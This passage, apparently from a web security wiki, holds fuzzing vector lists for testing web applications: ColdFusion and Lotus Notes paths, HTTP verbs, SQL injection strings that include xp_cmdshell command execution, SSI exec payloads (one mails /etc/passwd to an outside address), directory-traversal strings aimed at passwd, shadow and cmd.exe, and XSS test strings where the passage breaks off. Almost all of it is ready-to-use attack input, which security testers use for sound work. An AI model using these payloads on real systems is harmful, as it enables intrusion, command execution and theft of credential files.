CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
